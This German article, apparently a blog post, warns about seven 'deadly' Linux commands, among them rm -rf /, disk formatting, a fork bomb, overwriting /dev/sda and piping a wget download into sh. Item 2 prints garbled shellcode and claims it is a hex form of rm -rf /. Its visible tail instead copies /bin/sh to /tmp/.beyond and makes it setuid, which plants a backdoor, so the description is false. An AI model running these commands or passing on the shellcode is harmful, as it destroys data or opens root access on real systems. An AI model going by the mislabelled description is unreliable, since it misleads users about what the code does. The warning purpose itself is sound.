Bild: LEFOI (Browse Tux) / Creative Commons BY-NC-SA

1. Kommando:

rm -rf /

Rekursiv alle Dateien innerhalb des Wurzelverzeichnisses löschen.

2. Kommando:

char esp[] __attribute__ ((section(„.text“))) /* e.s.p
release */
= „xebx3ex5bx31xc0x50x54x5ax83xecx64x68“
„xffxffxffxffx68xdfxd0xdfxd9x68x8dx99“
„xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7“
„x56x04xf7x56x08xf7x56x0cx83xc4x74x56“
„x8dx73x08x56x53x54x59xb0x0bxcdx80x31“
„xc0x40xebxf9xe8xbdxffxffxffx2fx62x69“
„x6ex2fx73x68x00x2dx63x00“
„cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;“;

Dies ist die Hex-Version von [rm -rf /].

3. Kommando:

mkfs.ext3 /dev/sda

Formatiert mit einem neuen Dateisystem und zerstört dabei alle vorhandenen Daten.

4. Kommando:

:(){:|:&};:

Führt zu einer sehr großen Anzahl von Prozessen und friert das System ein. Damit geht häufig Datenverlust einher.

5. Kommando:

any_command > /dev/sda

Führt beim schreiben auf ein Gerät zum totalen Datenverlust.

6. Kommando:

wget http://some_untrusted_source -O- | sh

Lädt Daten aus einer nicht vertrauenswürdigen Quelle und führt diese aus.

7. Kommando:

mv /home/yourhomedirectory/* /dev/null

Verschiebt alle Daten aus dem Home-Verzeichnis nach /dev/null.

Frei übernommen aus The 7 Deadly Linux Commands